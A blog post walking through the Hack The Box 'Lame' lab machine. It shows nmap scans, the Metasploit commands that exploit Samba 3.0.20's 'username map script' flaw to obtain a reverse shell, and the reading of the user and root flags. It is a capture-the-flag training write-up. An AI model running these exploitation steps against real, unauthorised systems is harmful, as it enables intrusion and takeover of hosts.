DEV Community

Cover image for [HTB] Machine - Lame
neiwad_
neiwad_

Posted on

[HTB] Machine - Lame

Step 1: preparation

  1. Connect to the VIP HTB VPN
  2. Add $IP variable to shell for faster operation
IP=10.10.X.X
echo $IP
Enter fullscreen mode Exit fullscreen mode

Step 2: enumeration

I first start with a basic nmap scan

nmap $IP
Enter fullscreen mode Exit fullscreen mode

This scan returns Host seems down. If it is really up, but blocking our ping probes, try -Pn

So I try with the related flag

nmap -Pn $IP
Enter fullscreen mode Exit fullscreen mode

And it returns that 4 ports are available

nmap basic scan result

Given that, I make a more precise (and longer) scan

nmap -Pn -sV -sC $IP
Enter fullscreen mode Exit fullscreen mode

nmap precise scan

I can see that vsFTPd is on version 2.3.4 and samba is on version 3.0.20.

It should be enough for exploitation.

Step 3: exploitation

Samba 3.0.20

A little search on the msfconsole give me a result nammed Samba "username map script" Command Execution.

msfconsole samba result

I so use this module and check which options are available

msf > use 0
msf > show options
Enter fullscreen mode Exit fullscreen mode

samba exploit options

The RHOSTS is empty and requiered, so I set it up

msf > set RHOSTS $IP (replace $IP with the real target IP)
Enter fullscreen mode Exit fullscreen mode

NOTE: The LHOST need to be setted up with the HTB VPN TUN interface, not your local IP.

And then I launch the exploit

msf > exploit
Enter fullscreen mode Exit fullscreen mode

exploit reverse shell

I am now in a reversed shell!

cd home
ls
- ftp
- makis
- service
- ...
cd makis
ls
- user.txt
cat user.txt
Enter fullscreen mode Exit fullscreen mode

The user flag is done.

For root, I come back the root of the shell, I navigate to the root folder and I get the root.txt file.

Step 4: that's it

If you want to subscribe to the HackTheBox Academy, you can use my referral link!

Top comments (0)